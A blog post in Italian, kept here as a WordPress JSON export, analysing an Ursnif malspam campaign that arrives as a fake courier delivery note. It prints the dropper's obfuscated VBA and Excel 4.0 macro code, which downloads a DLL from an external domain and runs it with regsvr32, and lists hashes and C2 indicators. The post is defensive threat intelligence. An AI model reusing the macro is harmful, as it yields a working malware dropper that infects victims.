{"id":2545,"date":"2021-06-04T12:17:53","date_gmt":"2021-06-04T10:17:53","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=2545"},"modified":"2023-05-10T10:52:32","modified_gmt":"2023-05-10T10:52:32","slug":"ursnif-cutwail-giugno","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/uncategorized-it\/ursnif-cutwail-giugno\/","title":{"rendered":"Malware Ursinf\/Cutwail &#8211; Giugno 2021"},"content":{"rendered":"\n<p style=\"text-align: justify\">Nuova campagna di <em>Malspam<\/em> contenente <strong>malware Ursnif<\/strong>. Il malware in allegato, risulta essere una falsa bolla di consegna del corriere <strong>Bartolini<\/strong>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/06\/image-7.png\" alt=\"\" class=\"wp-image-2586\" loading=\"lazy\" \/><figcaption class=\"wp-element-caption\"><em>Mail che veicola il Malware<\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p style=\"text-align: justify\">L&#8217;allegato malevolo risulta appartenere alla <strong>botnet Cutwail<\/strong> <strong>v2<\/strong>, gestita dal <em>Threat Actor <\/em><strong>NARWHAL SPIDER (<a href=\"https:\/\/www.crowdstrike.com\/blog\/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone\/\">info<\/a>)<\/strong>. <br>Cutwail v2 \u00e8 conosciuta anche come <strong>0bulk Psych Evolution R4<\/strong>. <br>Cutwail ha origine nel 2007 ed \u00e8 cresciuta tramite <strong>Pushdo<\/strong>, un malware che ha infettato moltissimi sistemi Windows incorporandole all&#8217;interno della botnet.<br>Fino al 2020, Cutwail v2 ha distribuito principalmente malware, tra cui Dridex e Gozi, oltre a truffe di phishing nel tentativo di rubare le credenziali delgi utenti.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">File xlsm<\/h2>\n\n\n\n<p style=\"text-align: justify\">L&#8217;allegato della mail contiene un <em>file<\/em> <strong>xlsm<\/strong> (<strong><em>dropper<\/em><\/strong>).<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/06\/image-4-1024x599.png\" alt=\"\" class=\"wp-image-2573\" loading=\"lazy\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Dettagli Macro<\/h3>\n\n\n\n<p>Macro contenute nell&#8217;allegato della mail:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Type: OpenXML\n-------------------------------------------------------------------------------\nVBA MACRO Questa_cartella_di_lavoro.cls \nin file: xl\/vbaProject.bin - OLE stream: 'VBA\/Questa_cartella_di_lavoro'\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \nFunction testo_uno()\n\nFor Each di In Sheets(3).UsedRange.SpecialCells(xlCellTypeConstants): Pk = \"-\"\nHi = Split(di, Pk)\nFor Each X In Hi\nnnv = nnv &amp; Sheets(msoTabStopCenter).Range(X)\nNext\nNext\ntesto_uno = nnv\nEnd Function\n\nFunction minusole(uu As String, ik As Integer)\nSheets(1).Cells(ik, 1).FormulaLocal = uu\nEnd Function\n\nSub rempofo()\nmII = 0: COsT = 0: Run (\"casuale\")\nEnd Sub\n\nFunction revisio()\nSheets(1).Cells(6, 1).FormulaLocal = pago_i &amp; nuove_d\nEnd Function\n\nFunction nuove_d()\nnuove_d = \"T\" &amp; vnumeros &amp; \"O\" &amp; \"()\"\nEnd Function\n\nFunction fare_E() As String\nfare_E = \"\" &amp; \"Y\"\nEnd Function\n\nFunction pago_i()\npago_i = Guida_1 &amp; \"R\" &amp; \"I\"\nEnd Function\n\nFunction v_promo() As Variant\nv_promo = Split(testo_uno, \"\" &amp; fare_E)\nEnd Function\n\nFunction coSa() As String\ncoSa = \"O\"\nEnd Function\n\nFunction pagina_P()\npagina_P = revisio\nEnd Function\n\nSub Visualizzazioni()\nExcel4MacroSheets.Add Before:=Worksheets(1): ActiveSheet.Visible = xlSheetHidden\nriservata = pagina_P: Sheets(1).Cells(2, 1).Name = \"casuale\"\nFor Each xt In v_promo\ndalla_legge = minusole(Guida_1 &amp; xt, 2): rempofo\nNext\nEnd Sub\n\nFunction Guida_1()\nGuida_1 = \"=\"\nEnd Function\n\nFunction bertranno()\nbertranno = \"\" &amp; \"_i\"\nEnd Function\n\nFunction vnumeros() As String\nvnumeros = coSa &amp; \"RN\"\nEnd Function\n-------------------------------------------------------------------------------\n+----------+--------------------+---------------------------------------------+\n|Type      |Keyword             |Description                                  |\n+----------+--------------------+---------------------------------------------+\n|Suspicious|Run                 |May run an executable file or a system       |\n|          |                    |command                                      |\n|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |\n|          |                    |used to obfuscate strings                    |\n|Hex String|'\\x00\\x02\\x08\\x19'  |00020819                                     |\n|Hex String|'\\x00\\x00\\x00\\x00\\x0|000000000046                                 |\n|          |0F'                 |                                             |\n|Hex String|'\\x00\\x02\\x08 '     |00020820                                     |\n+----------+--------------------+---------------------------------------------+\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>NOME.RIF(\"KK\";\"er\")\nNOME.RIF(\"D\";\"\\\")\nNOME.RIF(\"m\";ARCCOS(-0,5)*135\/PI.GRECO())\nNOME.RIF(\"p\";COS(RADIANTI(60))-COS(60*PI.GRECO()\/180))\nNOME.RIF(\"K\";\"w\")\nNOME.RIF(\"Z\";\"o\")\nSE(VAL.NUMERO(RICERCA(K;INFO.AREA.DI.LAVORO(1))); ;CHIUDE(VERO))\nNOME.RIF(\"A\";\"C:\"&amp;D&amp;CODICE.CARATT(CASUALE.TRA(65;m))&amp;CODICE.CARATT(CASUALE.TRA(65;m))&amp;CASUALE.TRA(100;999)&amp;CODICE.CARATT(CASUALE.TRA(65;m)))\nNOME.RIF(\"if\";CODICE.CARATT(115))\nNOME.RIF(\"B\";A&amp;D&amp;CODICE.CARATT(CASUALE.TRA(65;m))&amp;CODICE.CARATT(CASUALE.TRA(65;m))&amp;CASUALE.TRA(100;999)&amp;CODICE.CARATT(CASUALE.TRA(65;m)))\nNOME.RIF(\"F\";INFO.AREA.DI.LAVORO(13)&amp;\".\")\nNOME.RIF(\"U\";\"e\")\nRICHIAMA(\"K\"&amp;U&amp;\"rn\"&amp;U&amp;\"l32\";\"Cr\"&amp;U&amp;\"at\"&amp;U&amp;\"Direct\"&amp;Z&amp;\"ryA\";\"JCJ\";A;p)\nNOME.RIF(\"G\";NOME.RIF(\"h\";\"i\"))\nRICHIAMA(\"K\"&amp;KK&amp;\"n\"&amp;U&amp;\"l32\";\"CreateDir\"&amp;U&amp;\"ct\"&amp;Z&amp;\"ryA\";\"JCJ\";B;p)\nNOME.RIF(\"S\";\"t\")\nRICHIAMA(\"URLMON\";\"URLD\"&amp;Z&amp;\"wnl\"&amp;Z&amp;\"adT\"&amp;Z&amp;\"FileA\"; \"JJCCJJ\";p;RIMPIAZZA(\"hqps:\"&amp;INFO.AREA.DI.LAVORO(9)&amp;INFO.AREA.DI.LAVORO(9)&amp;\"c\"&amp;Z&amp;\"nsul\"&amp;S&amp;\"a\"&amp;S&amp;\"y\"&amp;Z&amp;\"n\"&amp;DESTRA(F)&amp;\"c\"&amp;Z&amp;\"m\";2;1;S&amp;S);B&amp;D&amp;F;p;p\n)\nATTESA(ADESSO()+\"00:00:09\")\nRICHIAMA(\"Sh\"&amp;U&amp;\"ll32\";\"Sh\"&amp;U&amp;\"llEx\"&amp;U&amp;\"cut\"&amp;U&amp;\"A\"; \"JJCCCCJ\";p;\"Op\"&amp;U&amp;\"n\";\"r\"&amp;U&amp;\"gsvr32\";\" -\"&amp;if&amp;\" \"&amp;B&amp;D&amp;F;p;p)\nFILE.CHIUDI(FALSO)<\/code><\/pre>\n\n\n\n<p style=\"text-align: justify\">La macro, contenuta nel documento, avvia una connessione verso il dominio <strong>consultatyon[.]com<\/strong> per scaricare il file <strong>dll<\/strong> contenente lo stadio successivo di <strong>Ursnif<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/06\/image-6.png\" alt=\"\" class=\"wp-image-2584\" loading=\"lazy\" \/><figcaption class=\"wp-element-caption\"><em>Dominio contattato per il download della dll<\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">DLL<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li> <strong>md5 <\/strong>3896AEE936D55D53EFA5E0D1C2AB817D<\/li>\n\n\n\n<li> <strong>sha1 <\/strong>589E3E955C870821277C7F2EA9F60BC37BBB7825<\/li>\n\n\n\n<li> <strong>sha256 <\/strong>E53CAA0529020312A9092B409C2A38D6DDF0C3D2786832A514657CA617DF770F<\/li>\n\n\n\n<li><strong> first-bytes-hex<\/strong> 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 <\/li>\n\n\n\n<li> <strong>imphash <\/strong>33440A0287E1F3D8BFD56DD3109F1807<\/li>\n\n\n\n<li> <strong>cpu <\/strong>32-bit<\/li>\n<\/ul>\n\n\n\n<h5 class=\"wp-block-heading\">Exports<\/h5>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Gasalways <\/strong>text:01019E40<\/li>\n\n\n\n<li><strong>Pitchnecessary <\/strong>text:0101A79B<\/li>\n<\/ul>\n\n\n\n<p>Dall&#8217;analisi della <em>dll <\/em>\u00e8 possibile identificare i domini utilizzati per il download del successivo stadio.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/pbs.twimg.com\/media\/E2tDlhrX0AY3es8?format=png&amp;name=900x900\" alt=\"Immagine\"\/><figcaption class=\"wp-element-caption\">Indirizzi e domini del Malware<\/figcaption><\/figure>\n\n\n\n<p style=\"text-align: justify\">Nell&#8217;ultimo stadio \u00e8 possibile identificare gli IP e i domini dei server di comando e controllo (<strong>C2<\/strong>)<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/pbs.twimg.com\/media\/E2tDvqMWQAI0Chz?format=png&amp;name=small\" alt=\"Immagine\"\/><figcaption class=\"wp-element-caption\">Indirzzi C2<\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">IOC<\/h2>\n\n\n\n<p><strong>DLL <\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>sha256 <\/strong>E53CAA0529020312A9092B409C2A38D6DDF0C3D2786832A514657CA617DF770F <\/li>\n<\/ul>\n\n\n\n<h5 class=\"wp-block-heading\">Domini e IP <\/h5>\n\n\n\n<p><strong>Dll<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>consultatyon[.]com<\/li>\n<\/ul>\n\n\n\n<p><strong>Loader<\/strong>: <\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>roudinoden[.]club <\/li>\n\n\n\n<li>cloudinoren[.]club<\/li>\n<\/ul>\n\n\n\n<p> <strong>C2<\/strong>: <\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>46.21.153[.]208 <\/li>\n\n\n\n<li>46.21.153[.]209 <\/li>\n\n\n\n<li>46.21.153[.]212 <\/li>\n\n\n\n<li>goudinoden[.]club <\/li>\n\n\n\n<li>woudinoden[.]club <\/li>\n\n\n\n<li>poudinoden[.]club <\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>File xlsm Dettagli Macro Macro contenute nell&#8217;allegato della mail: DLL Exports Dall&#8217;analisi della dll \u00e8 possibile identificare i domini utilizzati per il download del successivo stadio. IOC DLL Domini e IP Dll: Loader: C2:<\/p>\n","protected":false},"author":1,"featured_media":2573,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[954],"tags":[],"class_list":["post-2545","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized-it"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/2545","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=2545"}],"version-history":[{"count":1,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/2545\/revisions"}],"predecessor-version":[{"id":5209,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/2545\/revisions\/5209"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=2545"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=2545"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=2545"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}